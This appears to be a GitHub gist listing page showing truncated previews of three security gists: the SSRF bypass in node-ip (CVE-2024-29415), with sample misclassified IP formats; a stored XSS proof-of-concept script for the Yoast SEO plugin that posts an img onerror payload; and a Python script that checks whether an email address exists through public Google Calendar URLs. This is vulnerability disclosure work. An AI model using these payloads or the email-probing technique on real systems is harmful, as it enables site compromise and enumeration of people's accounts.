d0rb
/ gist:765b263c226edc3368e4ae90d440c05d
Created
June 5, 2024 09:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2024-29415 represents a significant security vulnerability in the node-ip package, a popular Node.js library used to retrieve IPv4 addresses. This library, instrumental in many server-side applications, has been identified as containing a serious flaw in its IP address classification function, isPublic(). This flaw can lead to Server-Side Request Forgery (SSRF) attacks when private IP addresses are misclassified as public. | |
| Vulnerability Description | |
| The core issue lies in the isPublic() function, which incorrectly identifies certain IP address formats as public, even when they represent private or reserved addresses. Notable examples of such misclassifications include: | |
| 127.1 | |
| 01200034567 | |
| 012.1.2.3 | |
| 000:0:0000::01 | |
| ::fFFf:127.0.0.1 |
d0rb
/ CVE-2024-4984 XSS Yoast SEO plugin for WordPress
Created
May 19, 2024 09:15
The Yoast SEO plugin is vulnerable to a Stored XSS attack due to insufficient sanitization and escaping of the display_name field in the class-metabox-formatter.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| // Crafty XSS payload | |
| var maliciousPayload = "<img src=x onerror=alert('XSS Attack!') />"; | |
| // Send the payload through the display_name field | |
| var xhr = new XMLHttpRequest(); | |
| xhr.open("POST", "/update_profile", true); // Replace "/update_profile" with the appropriate endpoint | |
| xhr.setRequestHeader("Content-Type", "application/json"); | |
| xhr.onreadystatechange = function() { | |
| if (xhr.readyState === XMLHttpRequest.DONE) { |
d0rb
/ check_gmail.py
Created
March 20, 2024 10:12
The check_gmail.py script is designed to determine the validity of a provided email address by checking if it has a public Google Calendar associated with it. The script achieves this by sending an HTTP request to the corresponding Google Calendar URL and analyzing the response. Based on the response received, the script provides insight into wh…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import requests | |
| from bs4 import BeautifulSoup | |
| def check_calendar_url(email): | |
| url = f"https://calendar.google.com/calendar/ical/{email}/public/basic.ics" | |
| try: | |
| response = requests.get(url) | |
| if response.status_code == 200: | |
| print("The email address is valid!") |